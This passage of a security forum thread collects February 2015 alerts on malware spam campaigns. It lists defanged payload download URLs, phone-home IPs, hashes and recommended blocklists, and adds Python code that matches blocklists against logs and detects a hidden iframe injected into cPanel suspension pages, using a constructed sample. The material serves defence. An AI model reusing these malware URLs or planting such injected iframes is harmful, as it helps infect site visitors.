> https://blog.malwarebytes.org/exploits-2/2015/02/celebrity-chef-jamie-olivers-website-hacked-redirects-to-exploit-kit/
... a compromise on RedTube, a top adult entertainment site. It was injected with a rogue iframe that directs visitors to the download and execution of an Angler exploit kit variant. The said EK targets Flash and Silverlight vulnerabilities:
> https://blog.malwarebytes.org/exploits-2/2015/02/top-adult-site-redtube-compromised-redirects-to-malware/
... Malwarebytes Labs Team."
:fear: :mad:
AplusWebMaster
2015-02-24, 14:29
FYI...
Fake Invoice SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-berendsen-uk-ltd-invoice.html
24 Feb 2015 - "This -fake- invoice is not from Berendsen UK Ltd but is a simple forgery. They are not sending out the spam and their systems have not been compromised in any way. Instead, this email has a malicious Word document attached.
From: donotreply@ berendsen .co .uk
Date: 24 February 2015 at 08:09
Subject: Berendsen UK Ltd Invoice 60020918 117
Dear Sir/Madam,
Please find attached your invoice dated 21st February.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.
Thank you...
I have only seen one sample of this email, with a Word document IRN001549_60020918_I_01_01.doc which has a -zero- detection rate*. Contained within this is a malicious Word macro which downloads a component from the following location:
http ://heikehall .de/js/bin.exe
This binary has a VirusTotal detection rate of 2/57**. Automated analysis tools... show that it attempts to phone home to:
92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)
MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites; however, the bad sites are concentrated in the following ranges:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57***.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156 "
* https://www.virustotal.com/en/file/10841585f9856262b8fa5fdeab9ff5ae3adab09a73af00c3fbc772bb96028275/analysis/1424770482/
** https://www.virustotal.com/en/file/5cf0ed4f294c6de3310316874fefac4a5aff9d67f1f08e9ab3cd1c9200bff21f/analysis/1424770511/
*** https://www.virustotal.com/en/file/ac8275e636cb5526768fc3abf027f6260fc7ce2c3b27b8d39ce3c092c6eccddc/analysis/1424772155/
- http://myonlinesecurity.co.uk/izabela-pachucka-arsenal-ltd-document-do-confirm-word-doc-malware/
24 Feb 2015 - "'Izabela Pachucka Arsenal LTD document do confirm' pretending to come from Izabela Pachucka <pachuckaizabela@ arsenalltd .pl> with a malicious word doc attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Izabela-Pachucka.png
The malware attached to this series of emails is exactly the same as in today’s Berendsen UK Ltd Invoice 60020918 117 – Word doc malware although renamed as roexport.doc* or roexport.xls..."
* http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/berendsen-1024x682.png
___
Fake Order SPAM - doc malware
- http://myonlinesecurity.co.uk/andrew-manville-icotherm-board-order-po15028-word-doc-malware/
24 Feb 2015 - "'Board Order – PO15028' pretending to come from Andrew Manville <andy@ icotherm .co .uk> with a malicious word doc attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Board-Order-PO15028.png
... exactly the -same- as the attachments to today’s other malicious word and excel macros Izabela Pachucka Arsenal LTD document do confirm – Word doc malware* and Berendsen UK Ltd Invoice 60020918 117 – Word doc malware** although re-named as SCAN_20150224_100752437.doc or SCAN_20150224_100752437.xls ..."
* http://myonlinesecurity.co.uk/izabela-pachucka-arsenal-ltd-document-do-confirm-word-doc-malware/
** http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60020918-117-word-doc-malware/
___
Fake 'Time Sheet' SPAM – PDF malware
- http://myonlinesecurity.co.uk/bobby-time-sheet-fake-pdf-malware/
24 Feb 2015 - "'Time Sheet' pretending to come from hartsellb@ mtpleasantnc .us with a zip attachment is another one from the current bot runs... The email looks like:
Sorry again this time it has a attachment.
Thanks
Bobby
24 February 2015: 2-9-15 to 2-15-15.zip: Extracts to: 2-9-15 to 2-15-15.exe
Current Virus total detections: 8/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0e4d5381c96ace96691abe446187247c47165eb1c55cb43400d780dd2d4f00a2/analysis/1424785308/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
199.116.77.164: https://www.virustotal.com/en/ip-address/199.116.77.164/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
- http://threattrack.tumblr.com/post/111956283543/time-sheet-spam
Feb 24, 2015
___
Fake 'EFT Notification' SPAM – PDF malware
- http://myonlinesecurity.co.uk/town-of-mt-pleasant-here-is-your-eft-notification-fake-pdf-malware/
24 Feb 2015 - "'TOWN OF MT PLEASANT, here is your EFT Notification' pretending to come from finance_ap@ cabarruscounty .us with a zip attachment is another one from the current bot runs... The email is very basic and terse and simply has this in the body :
live-842000_12-17-2014-PE-E.pdf
24 February 2015: live-842000_12-17-2014-PE-E.zip:
Extracts to: live-842000_12-17-2014-PE-E.exe
Current Virus total detections: 7/57*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/09b1a2ec386df70f97bbdffed694f82fcfc0d522e078bf63640ae75163ac6b27/analysis/1424793555/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
46.30.212.175: https://www.virustotal.com/en/ip-address/46.30.212.175/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
66.228.45.110: https://www.virustotal.com/en/ip-address/66.228.45.110/information/
___
Fake FedEx SPAM - trojan
- http://blog.mxlab.eu/2015/02/23/fake-email-regarding-delivery-attempt-by-fedex-contains-trojan/
Feb 23, 2015 - "... intercepted a new trojan distribution campaign by email with the subjects similar to:
Reese Torres agent Fedex
Dylan Livingstone agent Fedex
This email is sent from the spoofed address “Fedex <fedexservice@ juno .com>” and has the following body:
Dear Customer,
We tried to deliver your item on February 22th, 2014, 08:15 AM.
The delivery attempt failed because the address was business closed or nobody could sign for it.
To pick up the package,please, print the receipt that is attached to this email and visit Fedex location indicated in the invoice.
If the package is not picked up within 48 hours, it will be returned to the shipper.
Label/Receipt Number: 44364578782324455
Expected Delivery Date: February 22th, 2014
Class: International Package Service
Service(s): Delivery Confirmation
Status: Notification sent
Thank you
Copyright© 2015 FEDEX. All Rights Reserved...
The attached file Package.zip contains the 78 kB large file 443645787823424455.scr. The trojan is known as HEUR:Trojan.Win32.Generic or Win32.Trojan.Inject.Auto. At the time of writing, 5 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/09162dab1d254ad9fc583f165f554d57cd0205e129099ff102291ac4090cb23b/analysis/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
7,038 new security vulnerabilities - 2014 stats
- http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/
Feb 18, 2015 - "... 7,038 -new- security vulnerabilities were added to the NVD database in 2014. This means an average of 19 new vulnerabilities per day. The number is significantly higher than in 2013 and continues the ascending trend over the past few years.
> http://www.gfi.com/blog/wp-content/uploads/2015/02/number-of-vulnerabilities-09-14.jpg
24% of these vulnerabilities are rated as high severity. The percentage is lower than in 2013, but the actual number of high security vulnerabilities has -increased- compared to last year.
> http://www.gfi.com/blog/wp-content/uploads/2015/02/high-severity-vulnerabilities.jpg
Third-party applications are the most important source of vulnerabilities with over 80% of the reported vulnerabilities in third-party applications. Operating systems are only responsible for 13% of vulnerabilities and hardware devices for 4%.
> http://www.gfi.com/blog/wp-content/uploads/2015/02/vulnerability-distribution-by-product-type.jpg
Top operating systems by vulnerabilities reported in 2014
> http://www.gfi.com/blog/wp-content/uploads/2015/02/OS-chart.jpg
Top applications by vulnerabilities reported in 2014
> http://www.gfi.com/blog/wp-content/uploads/2015/02/application-chart.jpg
... Not surprisingly at all, web browsers continue to have the most security vulnerabilities because they are a popular gateway to access a server and to spread malware on the clients. Adobe free products and Java are the main challengers but web browsers have continuously topped the table for the last six years. Mozilla Firefox had the most vulnerabilities reported in 2009 and 2012; Google Chrome in 2010 and 2011; Internet Explorer was at the top for the last two years.
To keep systems secure, it is -critical- that they are fully patched. IT admins should focus on (patch them first):
- Operating systems (Windows, Linux, OS X)
- Web browsers
- Java
- Adobe free products (Flash Player, Reader, Shockwave Player, AIR).
Vulnerability and patch management should be priority tasks for every sysadmin. Microsoft’s updates are -not- enough because third-party applications are just as problematic..."
:fear::fear: :mad:
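Added example (my own code, not dynamoo's): the blocklists published in these posts mix single IPs with CIDR ranges, and the useful thing to do with them is to match them against outbound connection logs rather than type them into a firewall by hand. The Python below parses the 24 Feb list quoted above, normalises single IPs to /32 so one containment test covers both forms, and scans a few constructed proxy log lines (not real traffic) for destinations inside any listed range. The same parse_blocklist takes the 19 Feb list and the Superfish ranges in the earlier posts unchanged; the log format, the function names and the sample lines are my own assumptions.

```python
import ipaddress
import re

# Blocklist exactly as published above for the Berendsen/Dridex run (24 Feb 2015).
DRIDEX_BLOCKLIST = """
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156
"""

# Constructed proxy log lines (squid-like "time client method url"); not real traffic.
SAMPLE_PROXY_LOG = """\
1424770500.123 10.0.0.15 GET http://92.63.87.13/update.php
1424770501.456 10.0.0.22 GET http://www.example.com/index.html
1424770502.789 10.0.0.15 POST http://5.196.241.196/gate.php
1424770503.012 10.0.0.31 CONNECT 92.63.89.77:443
"""

IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def parse_blocklist(text):
    """Turn newline-separated IPs and CIDR ranges into ip_network objects.

    Bare IPs become /32 (or /128) networks. Blank lines and '#' comments are
    ignored; a malformed entry raises ValueError rather than being skipped
    silently, which is what you want from a list that feeds enforcement.
    """
    nets = [ipaddress.ip_network(line.split("#", 1)[0].strip(), strict=False)
            for line in text.splitlines() if line.split("#", 1)[0].strip()]
    # collapse_addresses merges duplicates and mergeable neighbours, one family at a time.
    v4 = [n for n in nets if n.version == 4]
    v6 = [n for n in nets if n.version == 6]
    return list(ipaddress.collapse_addresses(v4)) + list(ipaddress.collapse_addresses(v6))


def match_ip(ip, nets):
    """Return the first listed network containing ip, or None (also for non-IPs)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return None
    for net in nets:
        if addr.version == net.version and addr in net:
            return net
    return None


def scan_log(log_text, nets):
    """Return (line_no, client, dest_ip, network) for each line touching the blocklist."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        for ip in IPV4_RE.findall(url):      # hostnames are ignored; this is IP-only
            net = match_ip(ip, nets)
            if net is not None:
                hits.append((lineno, client, ip, str(net)))
    return hits


if __name__ == "__main__":
    nets = parse_blocklist(DRIDEX_BLOCKLIST)
    for hit in scan_log(SAMPLE_PROXY_LOG, nets):
        print("line %d: client %s reached %s (listed as %s)" % hit)
```

Note how the first sample line is caught by 92.63.84.0/22 even though 92.63.87.13 itself is not on the list: that is the reason the post lists the MWTV ranges rather than the single phone-home address.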
AplusWebMaster
2015-02-25, 04:00
FYI...
Fake 'LogMeIn' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/02/malware-spam-your-logmein-pro-payment.html
25 Feb 2015 - "This -fake- financial email does not come from LogMeIn, instead it has a malicious attachment:
From: LogMeIn .com [no_reply@ logmein .com]
Date: 25 February 2015 at 08:52
Subject: Your LogMeIn Pro payment has been processed!
Dear client,
Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.
Date : 25/2/2015
Amount : $999 ( you saved $749.75)
The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.
Thank you for choosing LogMeIn!
Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56*. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:
http ://junidesign .de/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57**. Automated analysis tools... show this calling home to the following IPs:
92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
... The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57***] and a malicious DLL which is probably a Dridex component [VT 4/57****].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104 "
* https://www.virustotal.com/en/file/2036453918e928f3a1931c5554c2e0167bd2fce399f76f090e4ba3bd2bedd72f/analysis/1424856686/
** https://www.virustotal.com/en/file/18bd732ba09803deafc175a689e14341b90debc723c57b9908853c261e4e8104/analysis/1424856906/
*** https://www.virustotal.com/en/file/e882695509007f04c5a3df99184d3e7b8b28734eb15afb8a376a15d58ee25369/analysis/1424858127/
**** https://www.virustotal.com/en/file/9cc83358ac8b7f1e6b80082cd4041e2291f8cdbd233754f26213e069480274bb/analysis/1424858199/
- http://myonlinesecurity.co.uk/your-logmein-pro-payment-has-been-processed-word-doc-or-excel-spreadsheet-malware/
25 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-LogMeIn-Pro-payment-has-been-processed.png
Fake emails mimic LogMeIn receipts
- http://blog.logmein.com/products/phishing-alert-fake-emails-mimic-logmein-receipts
Feb 17, 2015
___
Copy .com used to distribute Crypto Ransomware
- https://isc.sans.edu/diary.html?storyid=19371
2015-02-25 01:04:23 UTC - "Thanks to Marco for sending us a sample of yet another piece of crypto-ransom malware. The file was retrieved after visiting a compromised site (www .my-sda24 .com). Interestingly, the malware itself was stored on copy .com. Copy .com is a cloud based file sharing service targeting corporate users. It is run by Barracuda, a company also known for its e-mail and web filtering products that protect users from just such malware. To its credit, Barracuda removed the malware within minutes of Marco finding it. At least right now, detection for this sample is not great. According to Virustotal, 8 out of 57 virus engines identify the file as malicious [1]. A URL blacklist approach may identify the original site as malicious, but copy .com is unlikely to be blocked. It has become very popular for miscreants to store malicious files on cloud services, in particular if they offer free trial accounts. Not all of them are as fast as Barracuda in removing these files."
1] https://www.virustotal.com/en/file/1473d1688a73b47d1a08dd591ffc5b5591860e3deb79a47aa35e987b2956adf4/analysis/
146.185.221.150: https://www.virustotal.com/en/ip-address/146.185.221.150/information/
___
Dropbox SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-info-chemicals-shared-mt.html
25 Feb 2015 - "This spam leads to a malware download via Dropbox.
From: Info via Dropbox
Reply-To: hcm0366@ gmail .com
Date: 25 February 2015 at 05:38
Subject: Info Chemicals shared "MT 103_PO_NO!014.zip" with you
Signed by: dropbox .com
From Info:
"Good day ,
How are you today
pls check attached, my manager had requested I email you our new order details together with TT copy of balance payment. Kindly confirm in return.
regards,
Frank Manner
Broad Oak Ltd, Tiverton, Tiverton Way, Tiverton Business Park, Tiverton, Devon, EX16 6TG
Registered No. 1971053 England & Wales...
The email has been digitally signed by Dropbox (which means exactly nothing) and is -spoofing- the wholly legitimate Broad Oak Ltd who have been a target of this sort of thing several times before. In this case, the link in the email goes to:
https ://www .dropbox .com/l/dFxVxjuDRo3j2oANVURy2v
and then to
https ://www .dropbox .com/s/fnsprei93c45ts6/MT%20103_PO_NO!014.zip
Which leads to a malicious EXE file called MT 103_PO_NO!014.zip. Inside that is the malware itself, a file .pdf.scr which has a detection rate of 11/57*. According to the Malwr report it drops another executable with a detection rate of 9/57**. The payload looks similar to the Zeus trojan. Also, according to Malwr and ThreatExpert it attempts to communicate with an apparent web-to-Tor gateway at
mmc65z4xsgbcbazl .onion .am
onion .am is hosted on 37.220.35.39 (YISP Colo, Netherlands)... Be aware that there are probably many other Dropbox locations in use for this spam run. If you see more, I suggest you forward the email to abuse -at- dropbox.com ..."
* https://www.virustotal.com/en/file/ed7d56bf1e579bdaac0ba2d4f1c5be18256f58f2acf667c2a82a3f62341aca76/analysis/1424849825/
** https://www.virustotal.com/en/file/923b35b4e8744e47fa9e8f3cf93a6aeaccc148332a68a8325a7f4462ccf7ff4f/analysis/1424850664/
___
Fake 'eFax message' SPAM - malware
- http://myonlinesecurity.co.uk/efax-message-from-pots-modem-2-1-pages-caller-id-1-630-226-2563-fake-pdf-malware/
25 Feb 2015 - "'eFax message from “POTS modem 2 ” – 1 page(s), Caller-ID: 1-630-226-2563' pretending to come from message@ inbound .efax .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/eFax-message-from-POTS-modem-2.png
25 February 2015 : fax_2342.zip: Extracts to:fax_2342.exe
Current Virus total detections: 19/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c4556b57ff046c56cf8a53f55bd825570882444b284589547f688b98bf1adbc9/analysis/1424883423/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
188.65.112.97: https://www.virustotal.com/en/ip-address/188.65.112.97/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
77.72.169.166: https://www.virustotal.com/en/ip-address/77.72.169.166/information/
77.72.169.167: https://www.virustotal.com/en/ip-address/77.72.169.167/information/
:fear::fear: :mad:
AplusWebMaster
2015-02-26, 14:40
FYI...
cPanel ‘Account Suspended’ PHISH serves exploits
- https://blog.malwarebytes.org/exploits-2/2015/02/deceiving-cpanel-account-suspended-page-serves-exploits/
Feb 26, 2015 - "cPanel is one of the most popular web hosting control panels out there. It allows administrators to manage their website(s) using a graphical front end, perform maintenance and review important logs among other things. cPanel also has a user interface for CGI (short for Common Gateway Interface) typically used to run scripts and generate dynamic content. One such script populates a fairly well-known (and somewhat dreaded) page known as the “Account Suspended” page:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/suspended1.png
Visitors to a site are -redirected- to this screen for one of many reasons ranging from the site owner’s failure to pay for his hosting, violating the Terms and Conditions, or perhaps exceeding their allocated bandwidth... The page itself is made of HTML code, and can be edited by an administrator, often via a Web Host Manager (WHM). Many sites that were once used to distribute malware and have been suspended will sport that kind of page. One would assume that the site would now be harmless, since the hosting provider has already taken action. If you aren’t looking at the URL carefully (the suspended page should be displayed at the root of the domain) and assumed so, you might just run into a case where the site is actually fully compromised and still active... The injected iframe redirects straight to a Fiesta exploit kit landing page. The landing page usually performs various checks and prepares the exploits that are going to get fired at the victim. As is often the case with exploit kits, that page is heavily obfuscated to make identification a little bit more difficult... This case is a reminder not to trust a book by its cover and always exercise caution. Attackers were clever to hide the malicious redirect code where they did because they might trick someone into brushing off the site as “already terminated by the hosting provider”, when in fact it’s not. They might have fooled some, but they didn’t fool us..."
(More detail at the malwarebytes URL at the top.)
___
Fake 'Voice Message' SPAM - wav malware
- http://myonlinesecurity.co.uk/ring-central-new-voice-message-from-no-caller-id-on-25022015-at-1625-fake-wav-malware/
26 Feb 2015 - "'New Voice Message from No Caller ID on 25/02/2015 at 16:25' pretending to come from notify-uk@ ringcentral .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/ring-central-voice-message.png
26 February 2015: NoCallerID-1218-162550-153.wav.zip:
Extracts to: NoCallerID-1218-162550-1536.wav.exe
Current Virus total detections: 0/57* . The extracted file name is actually NoCallerID-1218-162550-153б.wav.exe (if you look closely, you can see that the 6 is not the number six at all but a foreign language character that looks like a number 6) This can cause analysis problems with some of the auto analysers which have crashed trying to analyse this one and an error on some windows systems, possibly leading to the file auto-running. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (voice or music) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/843c890b197dc780ea7b3c85688b6b11f8594083d2de055dce21fd1427ec0379/analysis/1424938264/
... Behavioural information
TCP connections
81.177.139.53: https://www.virustotal.com/en/ip-address/81.177.139.53/information/
95.211.144.65: https://www.virustotal.com/en/ip-address/95.211.144.65/information/
92.63.87.13: https://www.virustotal.com/en/ip-address/92.63.87.13/information/
80.150.6.138: https://www.virustotal.com/en/ip-address/80.150.6.138/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Copy Invoices' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/02/malware-spam-chris-christou.html
26 Feb 2015 - "This -fake- invoice spam comes with a malicious attachment:
From: Chris Christou [chris.christou@ greysimmonds .co.uk]
Date: 26 February 2015 at 10:45
Subject: Copy invoices
Hello ,
Please find copy invoices attached as per our telephone conversation.
Kind regards,
Chris
Chris Christou
Credit Control
Grey Simmonds
Cranes Point
Gardiners Lane South
Basildon
Essex SS14 3AP
Tel: 0845 130 9070
Fax: 0845 370 9071...
It does -NOT- come from Grey Simmonds, nor have their systems been compromised in any way. Instead, this is a simple forgery. I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57*] which contains this malicious macro... which downloads a further component from:
http ://xomma .net/js/bin.exe
This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56**. Automated analysis tools... show it attempting to phone home to the following IPs:
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)
This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57***] and 1997b0031ad702c8347267db0ae65539 [VT 4/57****].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119 "
* https://www.virustotal.com/en/file/73d0d60b84393ffbc09a94230384772ec688ff2c39a2a4de58ff705b2aa55e50/analysis/1424948249/
** https://www.virustotal.com/en/file/c56a46575f00e527844ea393c50aa58500dda94088c34489559b610200ba756b/analysis/1424948263/
*** https://www.virustotal.com/en/file/450c7642a35a6723a77c52cd37e3825662f3888ab8fcaa779f66bc557175553d/analysis/
**** https://www.virustotal.com/en/file/740d36c784a7d914f3bbee3e45e97c4c90346236ffce8fadf3fd3c881a8faccb/analysis/
- http://myonlinesecurity.co.uk/chris-christou-grey-simmonds-copy-invoices-word-doc-or-excel-xls-spreadsheet-malware/
26 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Grey-Simmonds-Copy-invoices.png
___
Fake email SPAM - malware attached
- http://myonlinesecurity.co.uk/nicolar-jhs-co-uk-ra-069767-fake-pdf-malware/
26 Feb 2015 - "'NicolaR RA 069767 (random numbers)' pretending to come from NicolaR@ jhs. co.uk with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/RA-069767.png
26 February 2015: RA_New.zip: Extracts to: RA_New.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/29a6cca9ecf3007adfcc6a8e18d846630afd0b7a6636660bd26800f0a499ee3e/analysis/1424955113/
___
Fake 'Sales Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/worldwind-co-uk-your-sales-invoice-fake-pdf-malware/
26 Feb 2015 - "'Your Sales Invoice' pretending to come from donotreply@ worldwind .co.uk with a zip attachment is another one from the current bot runs... The email looks like:
Your document is attached with our regards.
The document is in PDF format and requires Adobe Reader to view ...
26 February 2015: 131234.zip: Extracts to: 131234.exe
Current Virus total detections: 7/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f9a4c6e5f2bac899b95772bb1b380b4a6f376c71b6c14385aa9154197e1a677d/analysis/1424964940/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
89.248.61.60: https://www.virustotal.com/en/ip-address/89.248.61.60/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.116.122.136: https://www.virustotal.com/en/ip-address/217.116.122.136/information/
:fear::fear: :mad:
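A check for the cPanel trick described in the Malwarebytes item above, added here as an example and not code from that post or from cPanel: it treats a suspension template as suspicious when it is served off the domain root or carries an iframe to another host. The sample HTML, the example.com/example.net names and the 1x1 hidden iframe are constructed; the post does not give the real landing URL.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Phrases found in the stock cPanel suspended-page template.
SUSPENDED_MARKERS = ("account suspended", "this account has been suspended")


class _IframeCollector(HTMLParser):
    """Collect the attribute dicts of every <iframe> in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # html.parser stores valueless attributes as None; normalise to "".
            self.iframes.append({k: (v or "") for k, v in attrs})


def _is_hidden(attrs):
    """True for the 1x1 or CSS-hidden iframes that exploit-kit injections use."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    dims = [attrs[k] for k in ("width", "height") if k in attrs]
    return bool(dims) and all(d.strip().rstrip("px") in ("0", "1") for d in dims)


def assess_suspended_page(url, html):
    """Return the reasons a page that looks like a cPanel suspension notice
    should be treated as live rather than dead.

    url:  the URL the page was fetched from
    html: the response body
    """
    findings = []
    if not any(m in html.lower() for m in SUSPENDED_MARKERS):
        return findings  # not a suspension template; nothing to judge here
    fetched = urlparse(url)
    # A genuine suspension applies to the whole account, so the template is
    # served at the root of the domain, not at a deeper path.
    if fetched.path not in ("", "/"):
        findings.append(f"suspension template served off-root at {fetched.path}")
    collector = _IframeCollector()
    collector.feed(html)
    for attrs in collector.iframes:
        host = urlparse(attrs.get("src", "")).hostname
        if host and host != fetched.hostname:
            note = " (hidden)" if _is_hidden(attrs) else ""
            findings.append(f"iframe to third-party host {host}{note}")
    return findings


# Constructed sample: a suspension template with an injected hidden iframe.
# example.net stands in for the exploit-kit landing host, which the post
# does not name.
SAMPLE_INJECTED = """<!DOCTYPE html><html><head><title>Account Suspended</title></head>
<body><h1>This Account Has Been Suspended</h1>
<p>Please contact your hosting provider for more information.</p>
<iframe src="http://example.net/index.php?id=1" width="1" height="1"
        style="visibility: hidden"></iframe>
</body></html>"""

# Constructed sample: the same template with nothing injected.
SAMPLE_CLEAN = SAMPLE_INJECTED.split("<iframe")[0] + "</body></html>"

if __name__ == "__main__":
    print(assess_suspended_page("http://example.com/blog/", SAMPLE_INJECTED))
    print(assess_suspended_page("http://example.com/", SAMPLE_CLEAN))
```

Run it against a crawler's stored responses: a hit on the off-root check alone is worth a look, since a hosting provider suspends the account, not one directory of it.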
AplusWebMaster
2015-02-27, 14:36
FYI...
Bogus Search Engine leads to Exploits
- https://blog.malwarebytes.org/online-security/2015/02/bogus-search-engine-leads-to-exploits/
Feb 27, 2015 - "... Sadly, devious software makers are using all the tricks in the book to fool users into installing their programs. Even when you take all the precautions necessary and never download anything from an untrusted source, you could still end up with Adware. The recent Lenovo/Superfish fiasco is a good example of that. Brand new computers were pre-installed with Adware that surreptitiously injected ads into the browser by introducing vulnerabilities, in an almost undetectable way. Adware is not only annoying but can also weaken a computer’s security status. Today, we have another case to prove that point. Potentially Unwanted Programs often install a search assistant (or rather a browser and search -hijacker-) on people’s machines:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/webfindfast2.png
The idea is simple: To redirect people’s searches to affiliates or other sponsors and earn pay-per-click commissions. This one is hosted at webfindfast .com*:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/searches.png
